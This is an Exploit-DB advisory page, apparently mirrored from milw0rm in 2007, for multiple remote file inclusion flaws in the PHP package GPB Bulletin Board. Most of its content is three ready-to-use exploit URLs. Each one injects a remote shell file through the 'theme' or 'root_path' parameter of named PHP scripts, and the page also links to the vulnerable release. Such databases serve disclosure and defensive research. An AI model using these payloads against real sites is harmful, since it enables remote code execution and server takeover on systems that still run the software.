GPB Bulletin Board - Multiple Remote File Inclusions

EDB-ID:

3786




Platform:

PHP

Date:

2007-04-24


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

#GPB bulletin board Remote file include                                                        

#Download script : http://gpb.sourceforge.net/download/archive/gpb-unstable-2001.11.14-1.tar.gz

#D0rk : Download Script and install it in ur machine

#Exploit :

#http://localhost/[gpb_path]/themes/ubb/login.php?theme=shell.txt?

#http://localhost/gpb/include/db.mysql.inc.php?root_path= shell.txt?

#http://localhost/gpb/include/gpb.inc.php?root_path=shell.txt?

#Discovered by : ThE TiGeR

#Miro_Tiger100[at]hotmail[dot]com

# milw0rm.com [2007-04-24]